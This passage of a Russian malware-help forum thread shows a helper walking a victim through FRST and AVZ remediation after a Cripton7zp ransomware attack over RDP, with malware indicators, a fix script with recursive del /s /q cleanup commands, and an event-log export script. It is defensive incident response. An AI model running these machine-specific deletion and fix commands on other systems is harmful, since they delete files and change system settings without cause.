2023-05-08 12:36 - 2023-05-08 12:36 - 008639144 _____ C:\Users\Главный бухгалтер\Desktop\maincrt23.exe
2023-05-11 14:39 - 2017-05-23 10:29 - 000000000 _RSHD C:\ProgramData\WindowsUpdate
2023-05-10 13:12 - 2023-01-05 13:39 - 001631744 _____ () C:\Windows\services.exe
2017-07-26 08:26 C:\DrWeb Quarantine
ContextMenuHandlers1: [IObit Malware Fighter] -> {0BB81440-5F42-4480-A5F7-770A6F439FC8} => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFShellExt.dll -> Нет файла
ContextMenuHandlers4: [IObit Malware Fighter] -> {0BB81440-5F42-4480-A5F7-770A6F439FC8} => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFShellExt.dll -> Нет файла
ContextMenuHandlers6: [IObit Malware Fighter] -> {0BB81440-5F42-4480-A5F7-770A6F439FC8} => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFShellExt.dll -> Нет файла
FirewallRules: [{402796F8-BD35-4034-A72E-D898B7F13CCD}] => (Allow) C:\Program Files (x86)\IObit\IObit Malware Fighter\Surfing Protection\FFNativeMessage.exe => Нет файла
FirewallRules: [{0D36FDB3-DA74-4E7E-88D7-783D089E7231}] => (Allow) C:\Program Files (x86)\IObit\IObit Malware Fighter\Surfing Protection\FFNativeMessage.exe => Нет файла
FirewallRules: [{6C4EC9A1-D04C-4966-920A-A904C9F58EAC}] => (Block) LPort=445
FirewallRules: [{15400CCA-B816-4EA1-BE2B-BD25CFB39DCC}] => (Block) LPort=445
FirewallRules: [{BBED8FB1-790A-4CA9-8B4D-3F8014B2AF38}] => (Allow) C:\Users\Главный бухгалтер\Desktop\Предприятие 027\AnyDesk.exe => Нет файла
FirewallRules: [{96A24575-2295-4814-93C1-FD20DB00D87E}] => (Allow) C:\Users\Главный бухгалтер\Desktop\Предприятие 027\AnyDesk.exe => Нет файла
FirewallRules: [{43538C9E-CD90-4CC4-8866-6F5C5B69CA0B}] => (Allow) C:\Users\Главный бухгалтер\Desktop\Предприятие 027\AnyDesk.exe => Нет файла
FirewallRules: [{1A5B55FA-0730-4B84-9D9C-92C4A79F7128}] => (Allow) C:\Users\Главный бухгалтер\Desktop\Предприятие 027\AnyDesk.exe => Нет файла
FirewallRules: [{023D01BF-1174-40A0-8F1E-3FA9AA533AEC}] => (Allow) C:\Users\Главный бухгалтер\Desktop\Предприятие 027\AnyDesk.exe => Нет файла
FirewallRules: [{3AC9D760-8ED1-473D-BC20-95A858FF24C3}] => (Allow) C:\Users\Главный бухгалтер\Desktop\Предприятие 027\AnyDesk.exe => Нет файла
FirewallRules: [{23A6A04D-D5DB-4508-A647-1D19F4E85573}] => (Allow) C:\Users\Главный бухгалтер\Desktop\AnyDesk\AnyDesk.exe => Нет файла
FirewallRules: [{B340D263-715A-4B95-83D3-9788B020975E}] => (Allow) C:\Users\Главный бухгалтер\Desktop\AnyDesk\AnyDesk.exe => Нет файла
FirewallRules: [{444416D6-7B1A-473F-948D-2D199327143D}] => (Allow) C:\Users\Главный бухгалтер\Desktop\AnyDesk\AnyDesk.exe => Нет файла
FirewallRules: [{42432721-5535-4C86-B2AF-20878FDE7C3D}] => (Allow) C:\Users\Главный бухгалтер\Desktop\AnyDesk\AnyDesk.exe => Нет файла
FirewallRules: [{BCF91B38-B6A2-4CB0-AAC4-3B2DAA233AFD}] => (Allow) C:\Users\Главный бухгалтер\Desktop\AnyDesk\AnyDesk.exe => Нет файла
FirewallRules: [{E939177D-D74D-4739-B8C7-C97C8282559F}] => (Allow) C:\Users\Главный бухгалтер\Desktop\AnyDesk\AnyDesk.exe => Нет файла
StartBatch:
del /s /q C:\Windows\SoftwareDistribution\download\*.*
del /s /q "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*"
del /s /q "%userprofile%\AppData\Local\Opera Software\Opera Stable\Cache\Cache_Data\*.*"
del /s /q "%userprofile%\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cache\*.*"
del /s /q C:\Windows\Temp\*.*
del /s /q "%userprofile%\AppData\Local\temp\*.*"
del /s /q C:\Windows\Minidump\*.dmp
ipconfig /flushdns
sfc /scannow
endbatch:
Reboot:
End::[/CODE]Запустите FRST.EXE/FRST64.EXE, нажмите один раз [B]Исправить[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Упакуйте его в архив и прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен.

Загрузите, распакуйте на Рабочий стол и запустите [URL="https://yadi.sk/d/xIUtpEqJq4wru"]SecurityCheck by glax24 & Severnyj[/URL].
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши [B]Запуск от имени администратора[/B] (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например [I]C:\SecurityCheck\SecurityCheck.txt[/I].

Приложите этот файл к своему следующему сообщению.

Направляю файлы.

Саму программу, SecurityCheck.exe, прикладывать вместе с логом было лишним.

И по поводу фикса в FRST: я не зря писал "нажмите один раз Исправить и подождите". Провели исправление дважды, в результате важная часть информации в Fixlog.txt не попала. Если не сложно, посмотрите в папке C:\FRST предыдущий файл Fixlog и приложите в архиве.

[QUOTE][color=red][b]Контроль учётных записей пользователя [b]отключен[/b] (Уровень 1)[/b][/color][/QUOTE]Рекомендую ознакомиться со статьёй [URL="http://www.outsidethebox.ms/10034/"]Так ли страшен контроль учетных записей (UAC)?[/URL] и включить.

[QUOTE]------------------------------- [ HotFix ] --------------------------------
HotFix KB3177467 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3177467]Скачать обновления[/url][/b][/color]
HotFix KB3125574 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3125574]Скачать обновления[/url][/b][/color]
HotFix KB4499175 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175]Скачать обновления[/url][/b][/color]
HotFix KB4474419 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4474419]Скачать обновления[/url][/b][/color]
HotFix KB4565354 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4565354]Скачать обновления[/url][/b][/color]
HotFix KB4490628 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4490628]Скачать обновления[/url][/b][/color]
HotFix KB4539602 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4539602]Скачать обновления[/url][/b][/color][/QUOTE]Не установлено много важных обновлений. С учётом этого[QUOTE][color=red][b]Расширенная поддержка закончилась 14.01.2020, Ваша операционная система может быть уязвима к новым типам угроз[/b][/color][/QUOTE]систему крайне желательно обновить по полной, через автоматическое обновление, а проще и быстрее - с помошью [URL="https://www.drwindows.de/xf/threads/windows-7-update-pack-by-drwindows-januar-2023.15232/"]Windows 7 Update Pack by DrWindows[/URL].

[QUOTE]Avast Antivirus (выключен и обновлен)
Avast Free Antivirus v.21.2.2455 [color=red][b]Внимание! [url=https://bits.avcdn.net/insttype_FREE]Скачать обновления[/url][/b][/color][/QUOTE]Антивирус не актуальной версии и отключен.

[QUOTE]Mozilla Firefox 56.0 (x86 ru) v.56.0 [color=red][b]Внимание! [url=https://www.mozilla.org/ru/firefox/all/]Скачать обновления[/url][/b][/color]
[color=blue][b]^Проверьте обновления через меню Справка - О Firefox!^[/b][/color]
Opera Stable 45.0.2552.812 v.45.0.2552.812 [color=red][b]Внимание! [url=https://net.geo.opera.com/opera/stable/windows]Скачать обновления[/url][/b][/color]
[color=blue][b]^Проверьте обновления через меню Обновление и восстановление!^[/b][/color][/QUOTE]Браузеры устаревшие.

[QUOTE]Менеджер браузеров v.3.0.4.826 [color=red][b]Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов.[/b][/color] Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
Advanced Driver Updater 4.5.1086 v.4.5.1086 [color=red][b]Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, [url=https://support.microsoft.com/ru-ru/help/2563254/microsoft-support-policy-for-the-use-of-registry-cleaning-utilities]программу-оптимизатор или программу очистки реестра[/url].[/b][/color] Рекомендуется деинсталляция и сканирование ПК с помощью [url=https://www.malwarebytes.org/mwb-download/]Malwarebytes Anti-Malware[/url]. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.
DriverHub v.1.1.2.1563 [color=red][b]Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, [url=https://support.microsoft.com/ru-ru/help/2563254/microsoft-support-policy-for-the-use-of-registry-cleaning-utilities]программу-оптимизатор или программу очистки реестра[/url].[/b][/color] Рекомендуется деинсталляция и сканирование ПК с помощью [url=https://www.malwarebytes.org/mwb-download/]Malwarebytes Anti-Malware[/url]. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.[/QUOTE]Деинсталлируйте, если нет возможности удалить стандартным способом - сделайте принудительно, с помощью [URL="https://geekuninstaller.com/ru/download"]Geek Uninstaller Free[/URL].

О том, как могло пройти шифрование, так и не ответили. Оно было днём 08.05. Компьютер был включен? Доступ по RDP к нему был открыт?
Кстати, там ещё и майнер вам навесили, удалён заодно.

да компьютер был включен

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

добавлено

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

про RDP точно сказать не могу. скорее всего компьютер забыли выключить на выходные.
программа удаленного доступа не была запущенна.

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Система будет переустановлена на чистую. Есть смысл её сейчас обновлять? Информация №1 - базы 1С, остальная информация есть в архиве на другом носителе.

[QUOTE=Jekos_f75;1527981]про RDP точно сказать не могу. скорее всего компьютер забыли выключить на выходные.
программа удаленного доступа не была запущенна.[/QUOTE]Но Вы ведь понимаете, что сам собой на изолированный компьютер шифровальщик не пролезет. Разбирайтесь, как там всё устроено, явно был удалённый доступ.

[QUOTE=Jekos_f75;1527981]Система будет переустановлена на чистую. Есть смысл её сейчас обновлять?[/QUOTE]
Тогда обновите сразу после установки и не отключайте автообновление. И ставить желательно не 7-ку, которая устарела и не поддерживается, а 10-ку.

[QUOTE=Jekos_f75;1527981]Информация №1 - базы 1С, остальная информация есть в архиве на другом носителе.[/QUOTE]

Разновидность Cripton7zp Ransomware, без вариантов.
Только бэкапы спасают, актуальные и на недоступных носителях.

Пока не переустановили систему сделайте следующее, может помочь понять, как пролезли.
[url="https://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe[/url]:[code]begin
ExecuteFile('wevtutil.exe', 'epl System system.evtx', 0, 200000, false);
ExecuteFile('wevtutil.exe', 'epl Application Application.evtx', 0, 200000, false);
ExecuteFile('wevtutil.exe', 'epl Security Security.evtx', 0, 200000, false);
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -t7z -sdel -mx9 -m0=lzma:lp=1:lc=0:d=64m Events.7z *.evtx', 1, 300000, false);
ExitAVZ;
end.[/code]
В папке с AVZ появится архив [B]Events.7z[/B], загрузите его в доступное облачное хранилище или на файлообменник без капчи и дайте ссылку в теме.

[QUOTE=Vvvyg;1527986] Разновидность Cripton7zp Ransomware, без вариантов.

Я так понимаю расшифровать не получится?

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Ссылка на файл
[url]https://cloud.mail.ru/public/rQtc/YU2EgGCKR[/url]

Видно множество подключений по RDP с внешних ip адресов, причём, подбора паролей не было. Похоже, взломали уже давно, с января сидел майнер, 8 мая подключились, зашифровали и выключили ПК.

И, так, для сведения:
[QUOTE]Драйвер обнаружил ошибку контроллера \Device\Harddisk1\DR1.[/QUOTE]
SSD, похоже, настают кранты.

Расшифровки нет. Современные методы шифрования при корректной реализации шансов на подбор ключа практически не дают.

[QUOTE=Vvvyg;1527990]Видно множество подключений по RDP с внешних ip адресов, причём, подбора паролей не было. Похоже, взломали уже давно, с января сидел майнер, 8 мая подключились, зашифровали и выключили ПК.

И, так, для сведения:

SSD, похоже, настают кранты.

Расшифровки нет. Современные методы шифрования при корректной реализации шансов на подбор ключа практически не дают.[/QUOTE]

SSD всего полгода. Благодарю что уделили время. Будем ставить винду начисто. С программой 1С конечно будет напряг полный.